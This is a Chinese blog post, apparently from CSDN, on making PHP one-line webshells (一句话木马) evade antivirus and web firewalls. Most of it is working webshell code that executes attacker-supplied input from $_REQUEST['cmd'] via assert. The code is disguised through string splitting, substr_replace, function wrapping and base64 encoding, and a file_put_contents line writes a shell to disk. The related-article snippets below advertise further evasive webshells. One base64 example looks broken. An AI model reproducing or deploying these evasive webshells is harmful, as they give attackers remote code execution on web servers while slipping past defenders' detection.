php一句话木马免杀

最新推荐文章于 2024-07-15 15:57:49 发布
最新推荐文章于 2024-07-15 15:57:49 发布
阅读量1.7k 收藏 7
点赞数 6
文章标签: php 开发语言 网络安全 安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134528615
版权

php一句话木马免杀

针对于php一句话木马做免杀:

利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀

assert()

如果过滤eval()函数时,可以考虑尝试assert()函数

assert() 会将字符串当做PHP 代码来执行

  • assert() 只能执行单条PHP 语句。
  • assert() 是一个函数,可以动态调用。
  • 高版本PHP 中,assert() 被弃用

此时一句话木马即可构造为

<?php @assert($_REQUEST['cmd']); ?>

字符拼接函数

当eval和assert都被过滤时,即可考虑将函数拆分重组

例如

<?php
	$a="a"."s";
	$b="s"."e";
	$c="rt";
	$d=$a.$b.$c;
	$d($_REQUEST['cmd']);
?>

可正常执行

image-20231121112923882

编码加密后也可连接

image-20231121113137026

php函数替换拼接

可以使用php函数来进行字符串的替换拼接

substr_replace() 函数是 PHP 中用于替换字符串中的一部分内容的函数

使用方法:

string substr_replace ( string $string , string $replacement , int $start [, int $length ] )

参数说明:

  • $string:原始字符串。
  • $replacement:替换的字符串。
  • $start:替换的起始位置。
  • $length:可选参数,指定要替换的长度。如果未指定,则替换从起始位置开始一直到字符串末尾的部分

示例

<?php
	$a=substr_replace("asxxxx","se",2);
	$b=substr_replace($a,"rt",4);
	@$b($_REQUEST['cmd']);
?>

同上可执行可连接

定义函数包裹

使用定义函数,将危险函数放进函数中,替代调用

<?php
	function asrt1($a){
		assert($a);
	}
	@asrt1($_REQUEST['cmd']);
?>

GPC替换

当request被过滤时,尝试使用GET或者POST

当然该参数也可以使用字符串拼接等方式组合

加密

例如使用base64加密

<?php
	$a=base_decode(YXNzZXJ0/ZXZhbA==);
    $b=$a(base64_decode($_REQUEST['cmd']));
?>

生成一句话马文件

<?php file_put_contents('shell.php','<?php @assert($_REQUEST);?>')?>

同理,如果该函数中出现过滤,则可考虑使用上述的拼接替换字符

order libra
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5162
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
暗组免杀php,那些强悍的PHP一句话后门
weixin_33023513的博客
03-09 416
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马PHP1234567891011404 Not FoundNot FoundThe requested URL ...
PHP webshell 免杀方法
最新发布
qq_60256199的博客
07-15 1581
本文介绍phpwebshell简单的免杀方法,总结不一定全面,仅供读者参考。webshell通常可分为一句话木马,小马,大马,内存马。一句话木马是最简单也是最常见的webshell形式,这种木马体积小,隐蔽较强,免杀相对容易;小马是功能较为简单的Webshell,但比一句话木马稍复杂,可能会包含一个简单的文件管理界面或命令执行功能;
免杀-一句话免杀
m0_64180167的博客
12-13 481
根据这个师傅的文章来学习。
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
PHP一句话木马免杀(通过VirusTotal测试)
m0_52233414的博客
01-28 3458
通过拼接,编码,加密等方法对PHP一句话木马进行免杀处理
php一句话免杀
收集盒 Book box
09-13 1058
by Tm3yShell7 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost
PHP一句话 免杀
10-23
PHP一句话 免杀
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
PHP免殺一句話
01-20
免殺一句話 使用ascii算法 range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a [113]).chr($a[115]);
一句话木马要点和防范注意事项
05-24
例如,一个简单的PHP一句话木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句话木马的基本...
基于 python 实现的千倍速一句话木马密码爆破工具
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
渗透干货|史上最全一句话木马
2201_75362610的博客
03-16 2323
/可执行命令一句话密码-7ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句话木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
免杀实战之面向PHPWebShell免杀
kali_Ma的博客
10-13 2807
?}}}}?>我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!
深入探索PHP免杀技术及其防护策略
weixin_43822401的博客
07-03 430
免杀技术指的是通过各种手段修改或加密Webshell代码,使其不被安全软件识别的技术。这项技术在网络安全攻防演练中具有重要地位。D盾是一款专为IIS设计的主动防御保护软件,提供多种安全防护功能,包括一句话免疫、主动后门拦截等,以增强服务器的安全性。PHP免杀技术是网络安全领域中攻防双方技术较量的一部分。作为防御方,了解免杀技术的原理和实现方法对于加强防护至关重要。同时,通过采取有效的防护策略,可以显著提高Web应用的安全性,抵御免杀Webshell的威胁
一句话木马图片转换成php
01-28
一句话木马图片转换成php是指将一个包含恶意代码的图片文件(一句话木马)转换为可执行的php代码。这种操作通常是为了绕过一些安全策略,将恶意代码注入到目标系统中,从而实施各种攻击,如窃取用户信息、篡改网页内容等。 将一句话木马图片转换成php的步骤如下: 1. 首先,需要将图片文件上传到目标服务器。上传方式可以通过网页表单上传,或者利用其他漏洞实现远程文件包含等方式。 2. 接下来,需要对上传的图片进行解析,获取其中的恶意代码。这可以通过读取图片文件的二进制数据,并提取其中特定的标志来完成。 3. 一旦获取到恶意代码,就可以将其转换成可以执行的php代码。这个过程可能涉及到解码、解压缩等操作,以还原原始的php代码。 4. 最后,将得到的php代码执行,就可以实现一句话木马的功能。攻击者可以通过发送特定的请求,触发木马代码的执行,从而控制目标系统。 需要注意的是,上述操作是非法的,且具有很高的风险。一句话木马图片转换成php是黑客攻击的手段之一,目的是为了非法入侵、侵犯他人的隐私、窃取敏感信息等。因此,我们强烈建议遵守法律法规,不要参与任何形式的黑客活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值